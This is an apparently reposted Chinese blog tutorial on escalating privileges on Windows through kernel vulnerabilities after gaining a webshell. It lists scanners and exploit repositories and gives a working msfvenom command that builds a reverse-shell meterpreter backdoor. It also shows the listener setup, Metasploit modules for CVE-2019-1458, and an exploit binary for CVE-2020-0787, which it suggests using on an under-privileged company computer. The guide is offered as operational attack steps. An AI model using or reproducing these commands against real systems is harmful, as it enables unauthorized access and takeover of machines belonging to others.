win内核漏洞提权
2022/4/3 6:23:21
本文主要是介绍win内核漏洞提权,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
WIN系统溢出漏洞提权
漏洞筛选
在整个提权项目中,前提是拿到webshell。
关于系统的溢出漏洞,我推荐两个项目:
https://github.com/chroblert/WindowsVulnScan
WindowsVulnScan使用
首先用powershell执行ps1文件,在本地会生成json文件来存放系统补丁信息
json文件
python cve-check.py -C -f KB.json
然后在执行py文件,它会将可用的exp显示出来。
https://github.com/bitsadmin/wesng
wesng使用
在目标机上执行systeminfo命令
然后将获取到的信息复制到脚本同一目录下的system.txt中。
执行命令 python wes.py system.txt -o vulns.csv
漏洞补丁编号&系统版本对比筛选
基于漏洞文件-溢出漏洞提权辅助项目测评-定位
推荐项目:
https://github.com/Ascotbe/KernelHub 针对常用溢出编号指定找EXP
https://github.com/nomi-sec/PoC-in-GitHub 针对年份及编号指定找EXP
https://github.com/offensive-security/exploitdb 针对类型及关键说明指定找EXP
)https://github.com/SecWiki/windows-kernel-exploits 项目收集的EXP
基于Webshell-溢出漏洞提权利用平台msf测评
不同脚本Webshell权限不一致,一般jsp java权限默认系统权限,php aspx asp普通低权限。
先用msf生成一个后门
msfvenom -p windows/meterpreter/reverse_tcp LHOST=ip LPORT=3333 -f exe -o msf.exe
设置监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 3333
exploit
我用的是虚拟机win7,当的靶机,为了方便,我就直接执行后门了。
上线,获得低权限。
使用自带模块提权use multi/recon/local_exploit_suggester
找到可利用cve漏洞
使用exp use windows/local/cve_2019_1458_wizardopium
设置session会话 session 2
获得最高权限
基于本地用户-溢出漏洞提权
CVE-2020-0787提权
在某些环境下,比如一个公司中,你拥有一台公司电脑,但是你权限不够,就可以试试该方法。
使用该exp:BitsArbitraryFileMoveExploit.exe
如果主机没打补丁,就可能利用成功。
跳出cmd窗口,获得system权限。
这篇关于win内核漏洞提权的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-05-19永别了,微服务架构!
- 2024-05-15鸿蒙生态设备数量超8亿台
- 2024-05-13TiDB + ES:转转业财系统亿级数据存储优化实践
- 2024-05-09“2024鸿蒙零基础快速实战-仿抖音App开发(ArkTS版)”实战课程已上线
- 2024-05-09聊聊如何通过arthas-tunnel-server来远程管理所有需要arthas监控的应用
- 2024-05-09log4j2这么配就对了
- 2024-05-09nginx修改Content-Type
- 2024-05-09Redis多数据源,看这篇就够了
- 2024-05-09Google Chrome驱动程序 124.0.6367.62(正式版本)去哪下载?
- 2024-05-09有没有大佬知道这种数据应该怎么抓取呀?